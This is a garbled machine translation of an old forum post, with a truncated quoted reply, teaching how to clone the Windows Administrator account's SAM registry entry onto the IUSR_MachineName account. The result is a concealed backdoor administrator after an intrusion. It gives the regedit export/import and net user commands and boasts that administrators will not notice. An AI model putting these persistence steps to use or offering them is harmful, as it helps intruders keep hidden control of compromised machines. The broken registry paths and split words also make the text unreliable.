How to clone an Administrator Account

Author: Adam@nsfocus.com

Sitehttp: // www.sometips.com

It is often seen that some people create an Administrator group after they intrude into a Windows 2000 or Windows NT.
User, it seems that when the Administrator does not exist normally, today I am against my previous intention, Share a similar RootKit
Of course, these processes can also be implemented using scripts, but I will not write them, OK, Show Time Now.

First, let everyone know that in Windows 2000 and Windows NT, the default Administrator Account SID is fixed.
500 (0x1f4), then we can use an existing account in the machine to clone the account with SID 500, in
Here, the account we selected is IUSR_MachineName (of course, we chose this account to enhance concealment,
All users can use the following methods, but this user is more common.) The test environment is Windows 2000 S.
Erver.

Run a System CMD Shell (http://www.sometips.com/tips/scripts/173.htm or use H
Ttp: // www.sometips.com/soft/psu.exe), and then run
Regedit/e adam. reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4
In this way, we export the information of the Administrator account whose SID is 500, edit the adam. reg file, and
The third line -- [HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4]
4 "change to the SID of IUSR_MachineName (the SID of this user is 0x3E9 for most machines. If
If IIS is not installed during installation, and you have created an account before installing IIS, it may not be the value .)
After "1F4" in the file is changed to "3E9", run
Regedit/s adam. reg
Import this Reg file

Then run
Net user IUSR_MachineName Sometips
Change the IUSR_MachineName password (it is best to use a 14-bit password, the better the password like IUSR_MachineName)

OK...

In this way, we have the same desktop and Profile as the default Administrator .....
Also, when we run net localgroup administrators, let's see the result:
C:> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the compu
Ter/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.

Let's look at the output result of USER2SID:
C:> user2sid Administrator

S-1-5-21-1004336348-1078145449-854245398-500

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

C:> user2sid iusr_machinename

S-1-5-21-1004336348-1078145449-854245398-1001

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

I don't think a brilliant administrator can see any abnormalities. Besides, I can change the administrator password as needed.
Log in with IUSR_MachineName and the password is Sometips... (no chivalrous administrator prefers to change IU frequently.
SR_MachineName is another name)

^ _ ^. This is not a RootKit...

Appendix:
1. Thanks to ding for paying the price for reinstall OS...
2. The failure to use the system caused by any tests using the above methods has nothing to do with me, and even does not provide technical support...

--
※Source: http://sinbad.dhs.org

Author: 42423432 I want to comment
Sender: 42423432 <2342342@1488.com>
Question: Re: How to clone an Administrator Account
Mailing site: sinbada (Sun Aug 4 19:16:26 2002)

[Mentioned in the masterpiece of Sinbad <anonymous@anonymous.com> :]
: How to clone an Administrator Account
:
: Author: Adam@nsfocus.com
: Date: 2002-04-28
: Sitehttp: // www.sometips.com
:
: It is often seen that some people create an Administrator group after they intrude into a Windows 2000 or Windows NT.
: User, it seems that when the Administrator does not exist normally, today I am against my previous intention, Share a similar RootKit
: Of course, these processes can also be implemented using scripts, but I will not write them, OK, Show Time Now.
:
: First, let everyone know the concept is that in Windows 2000 and Windows NT, the default Administrator Account SID is fixed.
:.....................

NO content for sam.